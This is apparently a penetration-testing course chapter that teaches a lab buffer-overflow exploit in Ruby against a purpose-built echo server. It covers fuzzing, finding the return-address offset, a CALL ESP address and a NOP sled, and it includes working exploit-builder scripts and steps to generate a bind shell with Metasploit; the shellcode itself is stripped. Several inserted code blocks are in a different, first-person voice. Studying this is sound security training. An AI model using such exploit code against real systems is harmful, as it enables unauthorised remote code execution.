9 Exploitation With Ruby

9.1 ELS Echo Server
9.2 The Exploit

Penetration Testing Professional 5.0 – Caendra Inc. © 2018


At this point of the Ruby course, you should be able to write both
simple and advanced Ruby scripts. We have seen how to manage files,
streams, OS commands, connections, low-level packets, and so on.


It is time to work on another common penetration testing activity:
exploitation. Since you already know how to set up a connection (TCP or
UDP) and how to send data over the network, there is little new to learn
on the Ruby side. If you have studied the system security module (buffer
overflows in particular), you have all the prerequisites to exploit a
vulnerable service using Ruby.


However, we will briefly review some buffer overflow concepts and
techniques in order to better understand all of the exploitation phases.
We will show how to identify a buffer overflow vulnerability in a
purpose-built server called “ELS Echo Server” and how to use Ruby to
exploit it.


9.1 ELS Echo Server

ELS Echo Server is a simple echo server that sends back every message it
receives. In the following example it is available at the address
172.16.5.10 and bound to port 7707, and it runs on a Windows XP SP3
machine.


Let us see how to interact with the server. ELS Echo is a very simple
service: it sends back the message it receives. Note that the server
answers only the first message, because it closes the connection right
after sending the response.


Many common attacks rely on programming mistakes, especially in the way a
service handles the input it receives from the user. In this case, ELS
Echo Server contains a classic C/C++ bug: the size of the data received
from the user is not checked before it is copied into a fixed-size
buffer, which makes a buffer overflow possible.


Let us see what happens when we send a lot of data to the server. First,
we send 100 characters to the service. As you can see, we obtain no
response at all: we can assume that the server has crashed.


This is the code that causes the crash. The vulnerable call is strcpy,
which copies the input until it meets a null byte without ever looking
at the destination size. You should know from the system module that if
the variable myinput contains more than 20 characters, a buffer overflow
occurs (strictly speaking, strcpy also copies the terminating null byte,
so a 20-character input already writes 21 bytes into the 20-byte
buffer).


This is how the stack looks when the function input_copy is called
(lower addresses at the top):

  +--------------------------+
  | buff_ov_variable         |  input_copy frame: local variables
  +--------------------------+
  | old EBP                  |
  +--------------------------+
  | Return Address           |
  +--------------------------+
  | myinput                  |  input_copy frame: arguments
  +--------------------------+
  | ...                      |  caller frame
  +--------------------------+


The size of buff_ov_variable is 20 bytes; therefore if we write more than
20 bytes into it, we have a buffer overflow: the copy runs past the
local variable, over the saved EBP, and onto the Return Address, which we
can therefore overwrite with a value of our choice.


From the system security module, you know that a common technique for
making use of the overwritten Return Address is to point it at a CALL ESP
instruction found in a module loaded by the process (kernel32.dll in
this example) and to place the malicious code right after the return
address in our buffer.

This works because ESP stores the address of the top of the stack: when
RET executes, it pops the overwritten Return Address into EIP and the
input_copy frame is discarded, so ESP now points just past the Return
Address, right at the bytes we placed there. The CALL ESP then transfers
execution to our malicious code. Note that a hard-coded kernel32.dll
address only works because Windows XP has no ASLR; the address is
specific to the exact OS version, service pack and language build.


Therefore, to correctly exploit the vulnerability, we have to find out
where in our input to place the CALL ESP address and the malicious
PAYLOAD:

  +--------------------------+
  | NOP, NOP, NOP ...        |  input_copy frame: local variables
  +--------------------------+
  | NOP                      |  old EBP
  +--------------------------+
  | CALL ESP address         |  Return Address
  +--------------------------+
  | NOP                      |  input_copy frame: arguments
  +--------------------------+
  | Malicious PAYLOAD        |  caller frame
  +--------------------------+


Remember that the previous concepts have been explained in the system
module. If you are not clear on them, we suggest you go back to the
system module, where this topic is explained in more depth.


9.2 The Exploit

Now we will see how to write a real exploit for the buffer overflow
vulnerability of the ELS Echo Server using Ruby. Once we know the layout
of the stack at the moment of the overflow, using Ruby to send the
exploit is very easy.


We have seen in the bug detection section that a buffer overflow
vulnerability exists, but we do not yet know at which offset in our
input the return address of the input_copy stack frame lies. That offset
is required to craft the entire payload.


Fuzzing, in this context, is an incremental technique to detect the
correct position of the return address, and it is mainly used when we
cannot debug the vulnerable service. This is a common situation when you
work with closed-source software.

A fuzzer generally sends semi-random attack vectors to an application,
growing them step by step, and observes how the application reacts
(echoes, errors, crashes). This is used to discover how the stack looks.
With a reasonable number of attempts, you can detect the correct
position of the return address.
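Here is the probe-and-grow loop the two previous paragraphs describe, as an added Ruby example (it is not code from the course): probe opens a connection, sends one message and reads the echo until the server closes the socket, the way ELS Echo behaves; fuzz_length grows an all-'A' input in fixed steps until the service stops echoing. The default host and port, the step sizes and stub_prober (a constructed stand-in for a service that dies past a given input length, used only to exercise the loop offline) are my assumptions.

```ruby
require 'socket'
require 'timeout'

# Send one message to an echo-style service and return what it sends back.
# Returns nil when the service does not answer: connection refused (it has
# already died), reset, or no data before the timeout.
def probe(host, port, data, timeout: 3)
  sock = nil
  Timeout.timeout(timeout) do
    sock = TCPSocket.new(host, port)
    sock.write(data)
    sock.read # ELS Echo closes the connection after its reply, so read to EOF
  end
rescue Errno::ECONNREFUSED, Errno::ECONNRESET, Errno::EHOSTUNREACH,
       Errno::ETIMEDOUT, Timeout::Error, EOFError
  nil
ensure
  sock&.close
end

# Grow the input in fixed steps until the service stops echoing it back.
# Returns the first length that produced no (or a wrong) echo, or nil if the
# service survived every length up to +max+. +prober+ is injectable so the
# loop can be exercised against a stub instead of a live target.
def fuzz_length(host, port, start: 10, step: 10, max: 500, prober: method(:probe))
  (start..max).step(step) do |len|
    data = 'A' * len
    reply = prober.call(host, port, data)
    return len if reply.nil? || !reply.start_with?(data)
  end
  nil
end

# Constructed stand-in for ELS Echo: echoes anything up to +crash_at+ bytes,
# then stops answering. Only for exercising fuzz_length without a target.
def stub_prober(crash_at)
  ->(_host, _port, data) { data.bytesize > crash_at ? nil : data }
end

if $PROGRAM_NAME == __FILE__
  if ARGV.size == 2
    host = ARGV[0]
    port = ARGV[1].to_i
    puts "echo test: #{probe(host, port, "hello\n").inspect}"
    len = fuzz_length(host, port)
    puts(len ? "service stopped echoing at #{len} bytes" : 'service survived all lengths')
  else
    puts "usage: ruby #{File.basename($PROGRAM_NAME)} HOST PORT   (e.g. 172.16.5.10 7707)"
  end
end
```

The first length at which the echo disappears only brackets the crash (the server dies as soon as the saved return address is corrupted, not at the exact byte), which is why the following pages switch to a debugger and a cyclic pattern to get the exact offset.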


Obviously, penetration testers and hackers use fuzzers only if they
cannot debug the target application themselves. If you have the service
executable, you can use tools like Immunity Debugger, IDA Pro or Ollydbg
(see the references at the end of this section) to debug it and find the
return address position on your own.
Since we have both the source code and the executable of the ELS Echo
service, we will show how to use Immunity Debugger in conjunction with
some useful tools provided by the Metasploit Framework. We will map the
ELS Echo Server stack and detect the position of the return address of
the function input_copy.


Let us execute the ELS Echo server under Immunity Debugger. Remember
that it runs on a Windows XP SP3 (32-bit) OS.


Looking at the previous screenshot, you can see that we have set a
breakpoint on the RETN instruction of the input_copy function. This is
because we want to check the value of the EIP register right after the
return.


Remember that in this type of attack, when we overwrite the stack memory
locations, we also overwrite the location that stores the function's
return address. Therefore, when RETN executes, the EIP register is
loaded with whatever value our buffer overflow placed there.


For example, let us see what happens when we send a long string of “A”
characters. As you can see, the service crashes and EIP holds
0x41414141, that is “AAAA” (0x41 is the hex value of 'A').


To detect where the return address location is (its offset from the
start of the vulnerable buffer), we can use two Metasploit tools that you
have already seen in the system module: pattern_create.rb and
pattern_offset.rb, available in
• /usr/share/metasploit-framework/tools/ (tools/exploit/ in more recent
  Metasploit releases)

First of all, we have to create a pattern with pattern_create.rb; 100
characters is enough.


Then we send the string to the ELS Echo Server using Ruby. This crashes
the server again, but this time the bytes that land in EIP are unique
within the pattern, so they tell us the exact position of the return
address in the stack. As you can see, EIP now contains the value
35624134; this is the value we pass to pattern_offset.rb, which looks up
those four bytes (in little-endian order, “4Ab5”) in the pattern and
returns their offset.


The return address location in the stack is at position 44. Attention:
44 is the offset from the first byte of our vulnerable buffer. This means
that our script payload must consist of 44 bytes of filler followed by
the address of a CALL ESP (or JMP ESP) instruction (e.g. 0x7C868667 on
this Windows XP SP3 machine; the address depends on the exact OS version,
service pack and language, so verify it on the target with the
debugger).
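To make the pattern_create.rb / pattern_offset.rb step concrete, here is an added Ruby re-implementation of the two tools (my code, not Metasploit's): pattern_create builds the same cyclic Aa0Aa1... pattern, and pattern_offset packs the EIP value in little-endian order and searches for it. With the values from this page it returns 44 for 0x35624134, and ret_address_bytes shows the same Array#pack('V') call turning 0x7C868667 into \x67\x86\x86\x7C, the byte order the exploit has to send.

```ruby
# Metasploit-style cyclic pattern: every 3-byte group is Upper+lower+digit,
# so any 4 consecutive bytes occur at exactly one offset within the first
# 20280 bytes (26*26*10*3). Past that the pattern repeats, as Metasploit's does.
UPPER = ('A'..'Z').to_a.freeze
LOWER = ('a'..'z').to_a.freeze
DIGIT = ('0'..'9').to_a.freeze

# Equivalent of: pattern_create.rb -l LENGTH
def pattern_create(length)
  out = +''
  loop do
    UPPER.each do |u|
      LOWER.each do |l|
        DIGIT.each do |d|
          out << u << l << d
          return out[0, length] if out.length >= length
        end
      end
    end
  end
end

# Equivalent of: pattern_offset.rb -q VALUE
# +value+ is the EIP shown by the debugger (Integer or hex String). x86 is
# little-endian, so the 4 bytes that overwrote EIP appear in the pattern in
# reverse order: EIP 0x35624134 was fed to the server as the bytes "4Ab5".
# Returns the offset, or nil if the value does not come from the pattern.
def pattern_offset(pattern, value)
  value = value.to_i(16) if value.is_a?(String)
  needle = [value].pack('V') # 'V' = 32-bit unsigned, little-endian
  pattern.b.index(needle)
end

# The return address goes into the buffer in the same little-endian order.
def ret_address_bytes(address)
  [address].pack('V')
end

if $PROGRAM_NAME == __FILE__
  pat = pattern_create(100)
  puts pat
  puts "offset of EIP 0x35624134 in the pattern: #{pattern_offset(pat, 0x35624134)}"
  puts "0x7C868667 on the wire: #{ret_address_bytes(0x7C868667).unpack1('H*')}"
end
```

With the real tools the equivalent invocations are pattern_create.rb -l 100 and pattern_offset.rb -q 35624134; a nil result from pattern_offset means EIP did not come from your pattern (for instance the crash corrupted something other than the return address), which is worth knowing before trusting an offset.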


Now we have everything we need to write our exploit. We will see how to
use Ruby and Metasploit to write and send a payload that executes the
calculator on the vulnerable target machine. Then we will also see how
to open a command shell on the victim that we can reach with telnet.

Remember that our target is a Windows XP SP3 machine with IP address
172.16.5.10, and that the ELS Echo Server is bound to port 7707.


The preamble is the space between the first byte of the vulnerable
buffer and the return address. We have seen that its length is 44 bytes.
This means that we can insert whatever we want in these bytes, since
their content is not relevant (as long as it contains no byte that
strcpy would stop at). By convention, the preamble is filled with NOP
instructions (\x90 is the opcode of NOP on x86).

In Ruby it is very easy to create a NOP preamble: a string of 44 '\x90'
bytes is a single string-repetition expression.


We have already seen that on Windows XP SP3 we can use 0x7C868667 as
the address of a CALL ESP instruction. x86 is a little-endian
architecture, so the address must be written into the buffer with the
least significant byte first: 0x7C868667 becomes \x67\x86\x86\x7c
(Ruby's Array#pack with the 'V' directive produces exactly this byte
order).


Before placing the real malicious payload, remember that right after the
return address comes the space of the arguments passed to the function,
followed by the caller's frame. It is not important to calculate the
exact size of this space; the important thing is to insert enough NOPs
before the real malicious payload.

Putting enough NOP instructions before our payload (a NOP sled) makes
sure that when the CALL ESP occurs, execution slides through the NOPs
and reaches the first instruction of our malicious payload, whatever the
exact distance: ESP points to the top of the stack, which now contains
some NOPs followed by the malicious payload.


This is how the stack looks just before RETN:

  +--------------------------+
  | NOP, NOP, NOP ...        |  input_copy frame: local variables
  +--------------------------+
  | NOP                      |  old EBP
  +--------------------------+
  | CALL ESP address         |  Return Address (popped into EIP by RETN)
  +--------------------------+
  | NOP, NOP, NOP ...        |  input_copy frame: arguments (ESP points here after RETN)
  +--------------------------+
  | NOP, NOP, NOP ...        |  caller frame
  | Malicious payload        |
  +--------------------------+

The next instruction executed is the CALL ESP, which jumps to the
address held in ESP and starts executing the NOPs until it reaches the
malicious payload:

  EIP = CALL ESP address ---> ESP points here:
                               +--------------------------+
                               | NOP, NOP, NOP ...        |
                               | Malicious payload        |
                               +--------------------------+

For our purpose, 10 NOPs are enough.


Now it is time to generate the real malicious payload. Metasploit helps
us with two tools: msfpayload and msfencode. We have already seen them;
the former generates the malicious payload, while the latter encodes it
in order to avoid bad characters. (In current Metasploit releases both
have been merged into a single tool, msfvenom, which takes the payload
options and the bad-character list on one command line.)


Our purpose is to create a payload that executes the calculator. This
means that after the exploitation, calc.exe will be automatically
executed on the server machine.

Since the vulnerability is caused by a strcpy in a C++ application, we
must avoid the '\x00' byte (the C string terminator): strcpy stops
copying as soon as it meets a null byte, so anything after it would
never reach the stack. Other bad characters depend on how the service
reads its input and have to be verified on the target.


The generated malicious payload is the last part of our entire buffer;
the entire buffer is therefore the concatenation of all the parts
generated in the previous steps: preamble, return address, NOPs and
malicious payload.


It is time to test if our exploit works. Obviously, we can use a simple
Ruby TCP connection to send the buffer we created in the previous step.
This is the full code of our exploit. As you can see, it is very simple.
Note that the payload has been stripped.


Now it is time to exploit ELS Echo Server. The exploitation script is
called echoS_calcExpl.rb and takes two arguments: the target host and
port. On the server machine a calculator has been executed: the exploit
works.


The previous exploitation has the purpose of showing you that the buffer
overflow vulnerability can be easily exploited. In real scenarios, the
penetration tester wants to do more useful things on the victim machine,
so that further misconfigurations and vulnerabilities can be discovered.


You have already seen that with Metasploit you can create several useful
payloads. The most commonly used are shell payloads and Meterpreter
payloads (with a bind or a reverse connection).

Now we will modify the previous exploitation script in order to use the
vulnerability to bind a command shell to a TCP port on the victim, which
we can then reach with telnet. Remember that the victim machine has the
address 172.16.5.10 and the vulnerable service ELS Echo Server is bound
to port 7707.


To create the payload we can use msfpayload and msfencode (to avoid the
\x00 byte in the resulting string). We want access to the command line
interface of the victim machine, therefore we can use the payload
windows/shell_bind_tcp.

Before creating the payload, let us see which options we can set for it.
We want the shell to listen on port 1117; therefore we generate the
payload with LPORT set to 1117 and run it through the encoder with \x00
as a bad character.


The script is easy: we can reuse the skeleton of the calculator
exploitation script and replace the calc malicious payload with the
string generated by msfpayload/msfencode. Here it is, with the final
payload updated. Note that the payload has been stripped.
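Here is the skeleton that both echoS_calcExpl.rb and echoS_shellExpl.rb share, as an added Ruby example (my code, not the course's scripts): build_exploit assembles preamble | return address | NOP sled | shellcode from the page's offset (44), return address (0x7C868667) and sled length (10); bad_char_offsets checks the whole buffer, return address included, for the \x00 byte strcpy would stop at; send_exploit delivers it over TCP. The shellcode itself is stripped on the page, so PLACEHOLDER_SHELLCODE is a constructed run of INT3 (0xCC) instructions standing in for the msfpayload/msfencode (or msfvenom) output for calc.exe or windows/shell_bind_tcp; the script file name in the usage line is assumed.

```ruby
require 'socket'

OFFSET    = 44           # bytes from the start of the buffer to the saved return address (pattern_offset)
RET_ADDR  = 0x7C868667   # CALL ESP in kernel32.dll on this Windows XP SP3 target; verify in the debugger
SLED      = 10           # NOPs between the return address and the shellcode
NOP       = "\x90".b
BAD_CHARS = ["\x00".b]   # strcpy stops copying at the first null byte

# Constructed placeholder for the stripped shellcode: INT3 instructions.
# Under Immunity Debugger a break here proves the hijack worked before the
# real msfpayload/msfencode output is pasted in.
PLACEHOLDER_SHELLCODE = ("\xCC".b * 8).freeze

# preamble | return address (little-endian) | NOP sled | shellcode
def build_exploit(shellcode, offset: OFFSET, ret_addr: RET_ADDR, sled: SLED)
  buf = NOP * offset
  buf << [ret_addr].pack('V')
  buf << NOP * sled
  buf << shellcode.b
  buf
end

# Offsets of every forbidden byte in the finished buffer, so the problem can
# be fixed (re-encode the shellcode, choose another address) before sending.
def bad_char_offsets(buf, bad = BAD_CHARS)
  buf.bytes.each_index.select { |i| bad.include?(buf.byteslice(i, 1)) }
end

def send_exploit(host, port, buf)
  sock = TCPSocket.new(host, port)
  sock.write(buf)
  sock.flush
  buf.bytesize
ensure
  sock&.close
end

if $PROGRAM_NAME == __FILE__
  if ARGV.size == 2
    buf = build_exploit(PLACEHOLDER_SHELLCODE)
    bad = bad_char_offsets(buf)
    abort "bad characters at offsets #{bad.inspect}, not sending" unless bad.empty?
    sent = send_exploit(ARGV[0], ARGV[1].to_i, buf)
    puts "sent #{sent} bytes; for the bind-shell payload: telnet #{ARGV[0]} 1117"
  else
    puts "usage: ruby #{File.basename($PROGRAM_NAME)} HOST PORT   (e.g. 172.16.5.10 7707)"
  end
end
```

The bad-character check covers the return address on purpose: an address such as 0x00401000 inside the executable itself would truncate the copy at offset 44, which is one reason the page reaches for a kernel32.dll address with no null bytes.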


Now we have a new script (called echoS_shellExpl.rb) that exploits the
victim's ELS Echo Server. Let us run it and see if it works.

Remember that the payload binds the shell to port 1117. Therefore, after
the exploit has run, we connect with telnet to 172.16.5.10 on port 1117.
Here we can see that the connection works: we have a command prompt on
the victim. Keep in mind that a bind shell accepts connections from
anyone who can reach that port, so close it as soon as the test is
complete.


Exploitation with Ruby

The remote machine (172.16.5.10) in the target network has a vulnerable
service named eLS Echo Service. Your goal is to find the vulnerability
and write a Ruby script that exploits it.


References

Immunity Debugger: https://www.immunityinc.com/products/debugger/
IDA Pro: https://www.hex-rays.com/products/ida/
Ollydbg: http://www.ollydbg.de/

